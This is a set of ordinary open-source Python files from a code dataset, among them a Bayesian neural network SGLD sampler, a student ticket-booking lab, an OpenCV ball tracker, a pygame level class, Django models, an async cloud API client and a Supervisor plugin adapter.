accs_batch.mean()\n\n def step(self, i, x, y, store_metrics, lr_decay=True, initial_step=False):\n \"\"\"\n Perform one step of SGLD on the model.\n\n Args:\n x (torch.Tensor): Training input data\n y (torch.Tensor): Training labels\n lr_decay (bool): Flag that controls whether the learning rate should decay after this step\n\n Returns:\n loss (float): The current loss of the model for x and y\n \"\"\"\n loss, log_prior, potential, acc = self._model_potential_and_grad(x, y)\n self.optimizer.step(calc_metrics=store_metrics)\n\n lr = self.optimizer.param_groups[0][\"lr\"]\n if lr_decay:\n self.scheduler.step()\n\n if store_metrics:\n # The metrics are valid for the previous step.\n self.store_metrics(i=i-1, loss=loss.item(), log_prior=log_prior.item(),\n potential=potential.item(), acc=acc.item(), lr=lr,\n corresponds_to_sample=initial_step)\n return loss, acc, None\n\n def get_samples(self):\n \"\"\"\n Returns the acquired SGLD samples from the last run.\n\n Returns:\n samples (dict): Dictionary of torch.tensors with num_samples*cycles samples for each parameter of the model\n \"\"\"\n if self.model_saver is None:\n return {k: v for (k, v) in self._samples.items() if k != \"steps\"}\n return self.model_saver.load_samples(keep_steps=False)\n\n def store_metrics(self, i, loss, log_prior, potential, acc, lr,\n corresponds_to_sample: bool,\n delta_energy=None, total_energy=None, rejected=None):\n est_temperature_all = 0.\n est_config_temp_all = 0.\n all_numel = 0\n add_scalar = self.metrics_saver.add_scalar\n for n, p in zip(self.param_names, self.optimizer.param_groups[0][\"params\"]):\n state = self.optimizer.state[p]\n add_scalar(\"preconditioner/\"+n, state[\"preconditioner\"], i)\n add_scalar(\"est_temperature/\"+n, state[\"est_temperature\"], i)\n add_scalar(\"est_config_temp/\"+n, state[\"est_config_temp\"], i)\n\n est_temperature_all += state[\"est_temperature\"] * p.numel()\n est_config_temp_all += state[\"est_config_temp\"] * p.numel()\n all_numel += p.numel()\n add_scalar(\"est_temperature/all\", est_temperature_all / all_numel, i)\n add_scalar(\"est_config_temp/all\", est_config_temp_all / all_numel, i)\n\n temperature = self.optimizer.param_groups[0][\"temperature\"]\n add_scalar(\"temperature\", temperature, i)\n add_scalar(\"loss\", loss, i)\n add_scalar(\"acc\", acc, i)\n add_scalar(\"log_prior\", log_prior, i)\n add_scalar(\"potential\", potential, i)\n add_scalar(\"lr\", lr, i)\n add_scalar(\"acceptance/is_sample\", int(corresponds_to_sample), i)\n\n if delta_energy is not None:\n add_scalar(\"delta_energy\", delta_energy, i)\n add_scalar(\"total_energy\", total_energy, i)\n if rejected is not None:\n add_scalar(\"acceptance/rejected\", int(rejected), i)\n\n\nclass VerletSGLDRunner(SGLDRunner):\n def _make_optimizer(self, params):\n return mcmc.VerletSGLD(\n params=params,\n lr=self.learning_rate, num_data=self.eff_num_data,\n momentum=self.momentum, temperature=self.temperature)\n\n def step(self, i, x, y, store_metrics, lr_decay=True, initial_step=False):\n loss, log_prior, potential, acc = self._model_potential_and_grad(x, y)\n lr = self.optimizer.param_groups[0][\"lr\"]\n\n rejected = None\n delta_energy = None\n if i == 0:\n # The very first step\n if isinstance(self.optimizer, mcmc.HMC):\n # momentum should be sampled already, but it does not hurt to\n # sample again.\n self.optimizer.sample_momentum()\n self.optimizer.initial_step(\n calc_metrics=True, save_state=self.reject_samples)\n if self.reject_samples:\n rejected = False # the first sample is what we have.\n elif 
initial_step:\n # Calculate metrics using the possible sample's parameter (which is\n # not modified), its gradient, and the new momentum as updated by\n # `final_step`.\n self.optimizer.final_step(calc_metrics=True)\n delta_energy = self.optimizer.delta_energy(self._initial_potential, potential)\n if self.reject_samples:\n rejected, _ = self.optimizer.maybe_reject(delta_energy)\n\n # The first step of an epoch, but not the very first\n if isinstance(self.optimizer, mcmc.HMC):\n self.optimizer.sample_momentum()\n self.optimizer.initial_step(\n calc_metrics=False, save_state=self.reject_samples)\n else:\n # Any intermediate step\n self.optimizer.step(calc_metrics=store_metrics)\n\n if i == 0:\n # Very first step\n store_metrics = True\n total_energy = delta_energy = self.optimizer.delta_energy(0., 0.)\n self._initial_potential = potential.item()\n self._total_energy = 0.\n elif initial_step:\n # First step of an epoch\n store_metrics = True\n self._initial_potential = potential.item()\n self._total_energy += delta_energy\n total_energy = self._total_energy\n else:\n # Any step\n if store_metrics:\n delta_energy = self.optimizer.delta_energy(self._initial_potential, loss)\n total_energy = self._total_energy + delta_energy\n\n if store_metrics:\n # The metrics are valid for the previous step.\n self.store_metrics(i=i-1, loss=loss.item(), log_prior=log_prior.item(),\n potential=potential.item(), acc=acc.item(), lr=lr,\n delta_energy=delta_energy,\n total_energy=total_energy, rejected=rejected,\n corresponds_to_sample=initial_step)\n if lr_decay:\n self.scheduler.step()\n return loss, acc, delta_energy\n\nclass HMCRunner(VerletSGLDRunner):\n def _make_optimizer(self, params):\n assert self.temperature == 1.0, \"HMC only implemented for temperature=1.\"\n assert self.momentum == 1.0, \"HMC only works with momentum=1.\"\n assert self.descent_epochs == 0, \"HMC not implemented for descent epochs with temp=0.\"\n return mcmc.HMC(\n params=params,\n lr=self.learning_rate, num_data=self.eff_num_data)\n","repo_name":"ratschlab/bnn_priors","sub_path":"bnn_priors/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":17365,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"15476534342","text":"#Kevin Andrade\n#SE126.02\n#February 28, 2022\n#Lab 8\n\n\n#========== FUNCTIONS ==========\ndef chart(num,a,b,c):\n print(\" A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4\\n\")\n for i in range (0,5):\n print(\"row {0:2}\".format(i+1),end=\" \")\n for j in range (0,num):\n print(a[i][j],end=\" \")\n print()\n \n\n for i in range (0,5):\n print(\"row {0:2}\".format(i+6),end=\" \")\n for j in range (0,num):\n print(b[i][j],end=\" \")\n print()\n\n for i in range (0,5):\n print(\"row {0:2}\".format(i+11),end=\" \")\n for j in range (0,num):\n print(c[i][j],end=\" \")\n print()\n \n\ndef numrow():\n num = int(input(\"Enter desired row number: \"))\n while num > 15 or num < 1:\n print(\"*ERROR* Invalid Selection\")\n num = int(input(\"Enter desired row number: \"))\n\n return num\n\n\n\ndef numcol():\n num = input(\"Enter desired seat letter: \").lower()\n if (num == \"1\" or num == \"2\" or num == \"3\" or num == \"4\"):\n new = ord(num) - 22\n else:\n new = ord(num) - 96\n return new\n\n\n\ndef amount():\n num = int(input(\"How Many Tickets would you like to purchase?: \"))\n return num\n\n\n\ndef tixprice(num):\n if num > 0 and num <= 5:\n money = 200\n elif num > 5 and num <= 10:\n money = 175\n elif num > 10 and num 
<= 15:\n        money = 150\n\n    return money\n\n\n\ndef update(num,rownum,colnum,a,b,c):\n\n    avail = \"false\"\n    while avail == \"false\":\n        \n        if(rownum > 0 and rownum <= 5):\n            if a[rownum-1][colnum] == \"*\":\n                avail = \"false\"\n                print(\"\\nSeat is already taken, please make another selection!\")\n                rownum = numrow()\n                colnum = numcol()\n            else:\n                avail = \"true\"\n                a[rownum-1][colnum] = \"*\"\n\n        elif(rownum >= 6 and rownum <= 10):\n            if b[rownum-6][colnum] == \"*\":\n                avail = \"false\"\n                print(\"\\nSeat is already taken, please make another selection!\")\n                rownum = numrow()\n                colnum = numcol()\n            else:\n                avail = \"true\"\n                b[rownum-6][colnum] = \"*\"\n\n        elif(rownum >= 11 and rownum <= 15):\n            if c[rownum-11][colnum] == \"*\":\n                avail = \"false\"\n                print(\"\\nSeat is already taken, please make another selection!\")\n                rownum = numrow()\n                colnum = numcol()\n            else:\n                avail = \"true\"\n                c[rownum-11][colnum] = \"*\"\n\n    key = input(\"Would you like to see available seats? [Y/N]: \").lower()\n    \n    while key == \"y\":\n        counter = 0\n        \n        print(\"       A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4\\n\")\n        for i in range (0,5):\n            print(\"row {0:2}\".format(i+1),end=\" \")\n            countRow = 0\n            for j in range (0,num):\n                print(a[i][j],end=\" \")\n                if a[i][j] == \"*\":\n                    countRow += 1 \n                    counter +=1\n            print(\"....{} seats Available\".format(30-countRow))\n        \n\n        for i in range (0,5):\n            print(\"row {0:2}\".format(i+6),end=\" \")\n            countRow = 0\n            for j in range (0,num):\n                print(b[i][j],end=\" \")\n                if b[i][j] == \"*\":\n                    countRow += 1 \n                    counter += 1\n            print(\"....{} seats Available\".format(30-countRow))\n\n        for i in range (0,5):\n            print(\"row {0:2}\".format(i+11),end=\" \")\n            countRow = 0\n            for j in range (0,num):\n                print(c[i][j],end=\" \")\n                if c[i][j] == \"*\":\n                    countRow += 1 \n                    counter += 1\n            print(\"....{} seats Available\".format(30-countRow))\n\n        print(\"\\nThere are {} total seats available!\".format(450-counter))\n\n        key = \"n\"\n\n\n#========== Main Code ==========\n\nrow1 = [\"\"]\nrow2 = [\"\"]\nrow3 = [\"\"]\nrow4 = [\"\"]\nrow5 = [\"\"]\nrow6 = [\"\"]\nrow7 = [\"\"]\nrow8 = [\"\"]\nrow9 = [\"\"]\nrow10 = [\"\"]\nrow11 = [\"\"]\nrow12 = [\"\"]\nrow13 = [\"\"]\nrow14 = [\"\"]\nrow15 = [\"\"]\n\n\nrows = 15\nseats = 31\nfor x in range (0,seats):\n    row1.append(\"#\")\n    row2.append(\"#\")\n    row3.append(\"#\")\n    row4.append(\"#\")\n    row5.append(\"#\")\n    row6.append(\"#\")\n    row7.append(\"#\")\n    row8.append(\"#\")\n    row9.append(\"#\")\n    row10.append(\"#\")\n    row11.append(\"#\")\n    row12.append(\"#\")\n    row13.append(\"#\")\n    row14.append(\"#\")\n    row15.append(\"#\")\n\nsec1 = [row1,row2,row3,row4,row5]\nsec2 = [row6,row7,row8,row9,row10]\nsec3 = [row11,row12,row13,row14,row15]\n#print(sec1)\n#print(sec2)\n#print(sec3)\n\nchart(seats,sec1,sec2,sec3)\nprint(\"\")\nnumtix = amount()\ntotalprice= 0\nfor x in range (0,numtix):\n    y = x+1\n    print(\"\\nTicket #{}\".format(y))\n    inrow = numrow()\n    incol = numcol()\n    #print(inrow)\n    #print(incol)\n    price = tixprice(inrow)\n    totalprice = totalprice + price\n    check = \"y\"\n    while check == \"y\":\n        check = input(\"Would you like to see your current total? 
[Y/N] \").lower()\n if check == \"y\":\n print(\"\\nYour total is ${0:.2f}\".format(totalprice))\n check = \"n\"\n update(seats,inrow,incol,sec1,sec2,sec3)\n \n\nprint(\"\\nYour Grandtotal is ${0:.2f}\".format(totalprice))","repo_name":"gordiviris/Interm-Python","sub_path":"Andrade-8.py","file_name":"Andrade-8.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22400804119","text":"from collections import deque\nfrom picamera import PiCamera\nimport cv2\nimport time\nimport argparse\nimport imutils\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nfrom imutils.video import count_frames\nfrom imutils import paths\nfrom PIL import Image\nimport numpy as np;\n\n#camera video setup\nvs = VideoStream(usePiCamera=True).start()\ntime.sleep(2.0)\n# fps = FPS().start()\nprint(\"STARTING VIDEO FEED\")\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-b\", \"--buffer\", type=int, default=64, help=\"max buffer size\")\nargs = vars(ap.parse_args())\n\n#ORANGE COLOR MASK:\nboundaries = [\n ([7,120,120], [153,255,255])#ORANGE, OpenCV measures HSV from 0-255 range\n #HSV in 0-100 range: [3,30,30], [60,100,100] #OLD: [7,76,76], [153,255,255]\n]\n\n#TRACKED POINTS:\npts=deque(maxlen=args[\"buffer\"])\n\n#frame counter:\nframenumber=0\n\n(dX, dY) = (0,0)\ndirection = \"\"\n\n\n# LOOP CODE\nwhile True: #constant video frame read\n frame = vs.read()\n fps = FPS().start()\n \n #convert to HSV, set HSV boundaries\n hsv=cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n #cycling through boundaries, detecting mask\n for (lower,upper) in boundaries:\n lower = np.array(lower, dtype = \"uint8\")\n upper = np.array(upper, dtype = \"uint8\")\n\n #HSV\n mask = cv2.inRange(hsv,lower,upper)\n output = cv2.bitwise_and(hsv,hsv, mask=mask)\n \n #finding contours\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n center = None\n \n #largest contour, drawing bounding circle\n if len(cnts) > 0:\n #detecting ball and center:\n c=max(cnts, key=cv2.contourArea)\n ((x,y),radius)= cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n if (M[\"m00\"]==0): #to fix the divide by zero error?\n cv2.putText(frame, \"ERROR, no center\", (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0))\n else:\n center=(int(M[\"m10\"]/M[\"m00\"]),int(M[\"m01\"]/M[\"m00\"]))\n \n #drawing here:\n cv2.circle(frame, (int(x), int(y)), int(radius), (255,0,0), 2) #BOUNDING CIRCLE (blue)\n cv2.circle(frame, center, 5, (0,255,0),-1) #CENTER (green)\n \n diameter=radius*2\n \n #calculate z distance:\n zcoord=(diameter/473)**(1/(-1.07))\n #cv2.putText(frame, str(physicalz), (10,40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n #calculating u and v coordinates:\n #Photo dimensions: (1920,1080); Center coords: 960,540\n #Video Feed dimensions: (320,240); Center coords: 160,120\n cx=160 #video center x, photo: 960\n cy=120 #video center y, photo: 540\n u=x-cx\n v=y-cy\n v=-v #because reference frame is top left\n \n f=252\n #OLD: f=2714.285714 #focal length in px\n xcoord=(zcoord/f)*u\n ycoord=(zcoord/f)*v\n #convert to cm:\n zcoord=zcoord*(2.54)\n physicalz= \"Z: \" + str(zcoord) + \" m\"\n xcoord=xcoord*2.54\n ycoord=ycoord*2.54\n \n #truncating floats:\n u='%.2f'%(u)\n v='%.2f'%(v)\n xcoord='%.2f'%(xcoord)\n ycoord='%.2f'%(ycoord)\n zcoord='%.2f'%(zcoord)\n diameter='%.2f'%(diameter)\n \n uvcoord=\"(u,v): (\" + 
str(u) + \",\" + str(v) + \")\"\n cv2.circle(frame, (int(cx), int(cy)), 5, (0,0,255),-1) #drawing the image center point\n cv2.putText(frame, str(uvcoord), (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,25))\n \n realcoords=\"(X,Y,Z): (\" + str(xcoord) + \",\" + str(ycoord) + \",\" + str(zcoord) + \")\"\n cv2.putText(frame, str(realcoords), (10,40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n pts.appendleft(center)\n \n\n else:\n cv2.putText(frame, \"object not found\", (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0))\n \n# sumposx=0\n# sumposy=0\n #drawing tail and determining direction (and later velocity)\n for i in np.arange(1, len(pts)):\n# #TEST: smoothing function\n# sumposx=sumposx+pts[i][0]\n# sumposy=sumposy+pts[i][1]\n \n \n if pts[i-1] is None or pts[i] is None:\n continue\n \n if framenumber >= 10 and i == 1 and len(pts) == args[\"buffer\"]: #pts[i-10] is not None:\n #determine direction\n dX = pts[i][0]-pts[i-1][0]\n dY = pts[i][1]-pts[i-1][1]\n (dirX, dirY) = (\"\", \"\")\n far=\"\"\n swimspeed=\"\"\n \n #determine FPS\n fps.update()\n fps.stop()\n framerate= fps.fps()\n \n d=radius*2\n zdist=(d/473)**(1/(-1.07))\n \n #buffer to get rid of small movements (only big changes in position)\n if np.abs(dX)>=10:\n #calculating velocities, cleaning up strings\n #currently in px/s\n xvelocity=(pts[i][0]-pts[i-1][0])*framerate\n xvelocity=xvelocity*(zdist/f)\n xvelocity=xvelocity*.0254\n \n xvelocity='%.2f'%(xvelocity)\n v_x=\"V(x)= \" + str(xvelocity) + \"m/s\"\n cv2.putText(frame, str(v_x), (0,80), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n if np.abs(dY)>=10:\n yvelocity=(pts[i][1]-pts[i-1][1])*framerate\n yvelocity=yvelocity*(zdist/f)\n yvelocity=yvelocity*.0254\n \n yvelocity='%.2f'%(yvelocity)\n v_y=\"V(y)= \" + str(yvelocity) + \"m/s\"\n cv2.putText(frame, str(v_y), (0,100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n #object location cases\n #FIGURE OUT WHY ALWAYS UP AND RIGHT\n if pts[i][0]-cx>0:\n dirX= \"right\"\n else:\n dirX=\"left\"\n \n if pts[i][1]-cy>0:\n dirY= \"down\"\n else:\n dirY= \"up\"\n \n if 0<=zdist<=12:\n far=\"close\"\n swimspeed=\"slow\"\n \n elif 12 5:\n self.logger.warning(f'More than 5 attempt failed sleep(2)')\n await asyncio.sleep(3)\n else:\n await asyncio.sleep(1)\n if i >= self.tries_count:\n raise exp\n else:\n break\n return resp\n\n async def _call_api(self, client_id: int = None, pagination: bool = False, *args, **kwargs):\n headers = {'Authorization': f'Bearer {await self._get_access_token(client_id)}'}\n if pagination:\n results = []\n if 'params' in kwargs:\n params = kwargs.pop('params')\n else:\n params = {}\n for i in self._page_params_generator():\n self.logger.debug(f'page: {i}')\n resp = await self._do_request(headers=headers, params=params | i, *args, **kwargs)\n resp_json = await resp.json()\n results.extend(resp_json['results'])\n if len(results) >= resp_json['count']:\n break\n else:\n resp = await self._do_request(headers=headers, *args, **kwargs)\n results = await resp.json()\n return results\n\n @staticmethod\n def _decode_jwt(token: str) -> dict:\n return jwt.decode(token, algorithms=[\"RS256\"], options={\"verify_signature\": False})\n\n def _is_token_expired(self, token):\n decoded_token = self._decode_jwt(token)\n if int(time.time()) > decoded_token.get('exp'):\n return True\n return False\n\n def _page_params_generator(self):\n limit = self.page_items_limit\n offset = 0\n while True:\n yield {'limit': limit,\n 'offset': offset}\n offset += limit\n\n async def _get_access_token(self, client_id: str):\n if 
client_id:\n access_token = await self._get_client_access_token(client_id)\n else:\n access_token = await self._get_reseller_access_token()\n return access_token\n\n async def _get_reseller_access_token(self):\n if not (self.reseller_credentials.get('access') and not self._is_token_expired(self.reseller_credentials.get('access'))):\n if self.reseller_credentials.get('refresh') and not self._is_token_expired(self.reseller_credentials.get('refresh')):\n tokens = await self._refresh_token(self.reseller_credentials.get('refresh'))\n self.reseller_credentials = self.reseller_credentials | tokens\n elif self.reseller_credentials.get('username') and self.reseller_credentials.get('password'):\n await self.reseller_login(username=self.reseller_credentials.get('username'),\n password=self.reseller_credentials.get('password'))\n else:\n self.logger.error('No credentials found!')\n return self.reseller_credentials.get('access')\n\n async def _get_client_access_token(self, client_id):\n creds = self.client_credentials.setdefault(client_id, {})\n if not (creds.get('access') and not self._is_token_expired(creds.get('access'))):\n if creds.get('refresh') and not self._is_token_expired(creds.get('refresh')):\n tokens = await self._refresh_token(creds.get('refresh'))\n creds.update(tokens)\n elif self.reseller_credentials:\n tokens = await self.get_client_admin_token(client_id)\n creds.update(tokens)\n else:\n self.logger.error('No credentials found!')\n return creds.get('access')\n\n async def reseller_login(self, username: str, password: str,):\n self.reseller_credentials['username'] = username\n self.reseller_credentials['password'] = password\n tokens = await self._login(username=username,\n password=password)\n self.reseller_credentials = self.reseller_credentials | tokens\n\n\n #############\n # Resellers #\n #############\n async def _login(self, username: str, password: str):\n resource_path = '/iam/auth/jwt/login'\n method = 'POST'\n body = {\"username\": username,\n \"password\": password}\n self.logger.debug(f'auth with: {username}')\n resp = await self._do_request(url=resource_path, method=method, json=body)\n tokens = await resp.json()\n return tokens\n\n async def _refresh_token(self, token: str):\n resource_path = '/iam/auth/jwt/refresh'\n method = 'POST'\n body = {\"refresh\": token}\n self.logger.debug(f'refresh token: {token[:10]}...')\n resp = await self._do_request(url=resource_path, method=method, json=body)\n tokens = await resp.json()\n return tokens\n\n async def get_client_admin_token(self, client_id: int):\n resource_path = f'/id/auth/jwt/clients/{client_id}/admin_token'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method)\n return resp\n\n async def get_client(self, client_id: str):\n resource_path = f'/iam/clients/{client_id}'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, raise_for_status=True)\n return resp\n\n async def get_cloud_clients(self, state: str = 'active'):\n resource_path = '/iam/clients'\n method = 'GET'\n params = {'cloud': state}\n resp = await self._call_api(url=resource_path, method=method, params=params, raise_for_status=True,\n pagination=True)\n return resp\n\n async def get_users(self, client_id: str = None):\n resource_path = '/iam/users'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, raise_for_status=True,\n pagination=True)\n return resp\n\n\n #########\n # Cloud #\n #########\n async def list_regions(self, client_id: int = None):\n 
resource_path = '/cloud/v1/regions'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, pagination=True)\n return resp\n\n async def list_projects(self, client_id: int):\n resource_path = '/cloud/v1/projects'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, pagination=True)\n return resp\n\n async def list_flavors(self, project_id: int, region_id: int, client_id: int, include_prices='true'):\n resource_path = f'/cloud/v1/flavors/{project_id}/{region_id}'\n method = 'GET'\n params = {'include_prices': include_prices}\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def list_bmflavors(self, project_id: int, region_id: int, client_id: int, include_prices='true'):\n resource_path = f'/cloud/v1/bmflavors/{project_id}/{region_id}'\n method = 'GET'\n params = {'include_prices': include_prices}\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def list_instances(self, project_id: int, region_id: int, client_id: int, params: dict = {}):\n resource_path = f'/cloud/v1/instances/{project_id}/{region_id}'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def list_loadbalancers(self, project_id: int, region_id: int, client_id: int, params: dict = {}):\n resource_path = f'/cloud/v1/loadbalancers/{project_id}/{region_id}'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def search_instance_in_all_clients(self, instance_id: str = None, name: str = None):\n params = {}\n if instance_id:\n params['id'] = instance_id\n if name:\n params['name'] = name\n resource_path = '/cloud/v1/instances/search'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, params=params, pagination=True)\n return resp\n\n async def __aenter__(self) -> 'AioGCloud':\n return self\n\n async def __aexit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> None:\n await self.close()\n\n async def close(self) -> None:\n if self.session:\n await self.session.close()\n","repo_name":"v3111707/aiogcloud","sub_path":"src/aiogcloud/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20606232528","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\nfrom testing_project.helpers.validators import has_letters_only_validator\n\n\nclass Profile(models.Model):\n first_name = models.CharField(\n max_length=25,\n validators=[has_letters_only_validator],\n )\n\n last_name = models.CharField(\n max_length=25,\n validators=[has_letters_only_validator],\n )\n\n age = models.IntegerField(\n validators=(\n MinValueValidator(0),\n MaxValueValidator(150),\n )\n )\n\n @property\n def full_name(self):\n return f'{self.first_name} 
{self.last_name}'\n","repo_name":"GerganaTuleshkova/testing_project","sub_path":"testing_project/common/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33948635288","text":"import os\n\nfrom supervisor.http import supervisor_auth_handler\nfrom supervisor.medusa import default_handler, filesys\nfrom supervisor.options import split_namespec\nfrom supervisor.states import ProcessStates\n\n\n# Supvisors is started in Supervisor so information is available in supervisor instance\nclass SupervisordSource(object):\n\n    def __init__(self, supervisord):\n        self.supervisord = supervisord\n        if len(supervisord.options.server_configs) == 0:\n            raise Exception('no server configuration in config file: {}'.format(supervisord.configfile))\n        self.serverConfig = supervisord.options.server_configs[0]\n        # server MUST be http, not unix\n        serverSection = self.serverConfig['section'] \n        if serverSection != 'inet_http_server':\n            raise Exception('inet_http_server expected in config file: {}'.format(supervisord.configfile))\n        # shortcuts (not available yet)\n        self._supervisor_rpc_interface = None\n        self._supvisors_rpc_interface = None\n\n    @property\n    def supervisor_rpc_interface(self):\n        # need to get internal Supervisor RPC handler to call behaviour from Supvisors\n        # an XML-RPC call made inside another XML-RPC call on the same server is blocking\n        # so, not very proud of the following lines but could not access it any other way\n        if not self._supervisor_rpc_interface:\n            self._supervisor_rpc_interface = self.httpservers.handlers[0].rpcinterface.supervisor\n        return self._supervisor_rpc_interface\n\n    @property\n    def supvisors_rpc_interface(self):\n        if not self._supvisors_rpc_interface:\n            self._supvisors_rpc_interface = self.httpservers.handlers[0].rpcinterface.supvisors\n        return self._supvisors_rpc_interface\n\n    @property\n    def httpservers(self):\n        # ugly but works...\n        return self.supervisord.options.httpservers[0][1]\n\n    @property\n    def serverurl(self): return self.supervisord.options.serverurl\n    @property\n    def serverport(self): return self.serverConfig['port']\n    @property\n    def username(self): return self.serverConfig['username']\n    @property\n    def password(self): return self.serverConfig['password']\n    @property\n    def supervisor_state(self): return self.supervisord.options.mood\n\n    def get_env(self):\n        \"\"\" Return a simple environment that can be used for the configuration of the XML-RPC client. \"\"\"\n        return {'SUPERVISOR_SERVER_URL': self.serverurl,\n                'SUPERVISOR_USERNAME': self.username,\n                'SUPERVISOR_PASSWORD': self.password}\n\n    def close_httpservers(self):\n        \"\"\" Call the close_httpservers of Supervisor.\n        This is called when receiving the Supervisor stopping event in order to force the termination\n        of any asynchronous job. \"\"\"\n        self.supervisord.options.close_httpservers()\n        self.supervisord.options.httpservers = ()\n\n    def autorestart(self, namespec):\n        \"\"\" This method checks if autorestart is configured on the process. \"\"\"\n        application_name, process_name = split_namespec(namespec)\n        # WARN: the following line may throw a KeyError exception\n        process = self.supervisord.process_groups[application_name].processes[process_name]\n        return process.config.autorestart is not False\n\n    def update_extra_args(self, namespec, extra_args):\n        \"\"\" This method is used to add extra arguments to the command line. 
\"\"\"\n application_name, process_name = split_namespec(namespec)\n # WARN: the following line may throw a KeyError exception\n config = self.supervisord.process_groups[application_name].processes[process_name].config\n # on first time, save the original command line\n if not hasattr(config, 'config_ref'):\n setattr(config, 'config_ref', config.command)\n # reset command line\n config.command = config.config_ref\n # apply args to command line\n if extra_args:\n config.command += ' ' + extra_args\n\n def force_process_fatal(self, namespec, reason):\n \"\"\" This method is used to force a process state into supervisord and to dispatch process event to event listeners. \"\"\"\n application_name, process_name = split_namespec(namespec)\n # WARN: the following line may throw a KeyError exception\n process = self.supervisord.process_groups[application_name].processes[process_name]\n # need to force BACKOFF state to go through assertion\n process.state = ProcessStates.BACKOFF\n process.spawnerr = reason\n process.give_up()\n\n def force_process_unknown(self, namespec, reason):\n \"\"\" This method is used to force a process state into supervisord and to dispatch process event to event listeners. \"\"\"\n application_name, process_name = split_namespec(namespec)\n # WARN: the following line may throw a KeyError exception\n process = self.supervisord.process_groups[application_name].processes[process_name]\n process.spawnerr = reason\n process.change_state(ProcessStates.UNKNOWN)\n\n # this method is used to replace Supervisor web ui with Supvisors web ui\n def replace_default_handler(self):\n # create default handler pointing on Supvisors ui directory\n here = os.path.abspath(os.path.dirname(__file__))\n templatedir = os.path.join(here, 'ui')\n filesystem = filesys.os_filesystem(templatedir)\n defaulthandler = default_handler.default_handler(filesystem)\n # deal with authentication\n if self.username:\n # wrap the xmlrpc handler and tailhandler in an authentication handler\n users = {self.username: self.password}\n defaulthandler = supervisor_auth_handler(users, defaulthandler)\n else:\n self.supervisord.supvisors.logger.warn('Server running without any HTTP authentication checking')\n # replace Supervisor default handler at the end of the list\n self.httpservers.handlers.pop()\n self.httpservers.install_handler(defaulthandler, True)\n","repo_name":"danh1979/supvisors","sub_path":"supvisors/infosource.py","file_name":"infosource.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"25138554348","text":"import networkx as nx\nimport numpy as np\nimport random\n\nfrom urllib3 import Retry\n\n\n\nclass graph():\n\n def __init__(self, grid_size, frac_imp, cuts, unimp_cost_range, imp_cost_range, SV_cost_range, service_cost_range):\n \n \n self.grid_size = grid_size\n self.cuts = cuts # this can be an int indicating number of cuts or list of edges that are chosen by the user \n m,n = grid_size\n self.impeded_edges = []\n \n\n self.G = nx.grid_2d_graph(m,n)\n self.inverse_mapping={}\n self.node_relabel()\n self.GV_start = [1]\n self.GV_goal = [m*n]\n self.SV_start = [np.random.randint(1,m*n+1)]\n\n if isinstance(self.cuts, int):\n self.random_cuts()\n else:\n self.impeded_edges = self.cuts\n \n self.add_obstacles() # if we need to obstacle nodes in the graph\n\n self.add_impeded_edges(frac_imp,unimp_cost_range ,imp_cost_range,SV_cost_range,service_cost_range)\n\n\n \n def GV_terminals(self):\n all_dist = 
